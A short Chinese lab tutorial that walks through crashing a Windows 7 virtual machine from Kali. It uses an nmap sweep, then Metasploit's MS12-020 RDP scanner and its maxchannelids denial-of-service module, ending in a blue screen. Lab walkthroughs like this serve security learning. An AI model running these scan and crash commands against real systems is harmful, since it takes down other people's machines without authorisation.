这里我们需要两台虚拟机,一台kali虚拟机,一台Windows7虚拟机。
如图1是kali的虚拟机登陆界面:如图2是Windows7的登陆界面:登陆虚拟机kali打开终端ifconfig查看kali的ip。kali的ip是192.168.150.141
在Windows搜索栏里输入cmd打开终端输入ipconfig查看ip,这个是Windows7的ip:192.168.150.178
接下来开始攻击(开始前要把Windows7的3389端口打开(3389端口就是远程桌面协议)和Windows的防火墙关了更好成功)
nmap -sP +IPip是按照你机子的ip的,我的是nmap -sP 192.168.150.1/24(作用是扫描这个网段查找在线的ip)
两台机子ping一下在kali终端输入msfconsole进入这个msf控制端
输入search ms12-020,这条指令是搜索ms12-020模块输入use auxiliary/scanner/rdp/ms12_020_check ,然后我们show options一下
输入 use auxiliary/scanner/rdp/ms12_020_check
来选择 RDP 漏洞检测模块。
输入 show options
来显示当前模块的配置选项。输入set RHOSTS 192.168.150.1/24设置网段范围
输入run开始扫描检测ms12 -020漏洞(这里有点多就省略了查出来的前面有绿色+)
如果发现目标主机(例如192.168.150.178)容易受到MS12-020漏洞的影响,您可以使用DoS攻击模块 auxiliary/dos/windows/rdp/ms12_020_maxchannelids
针对发现的易受攻击的主机设置目标IP地址:set RHOST 192.168.150.178
最后run指令执行攻击Windows7成功效果图:这个蓝屏攻击等会Windows7重启就会结束!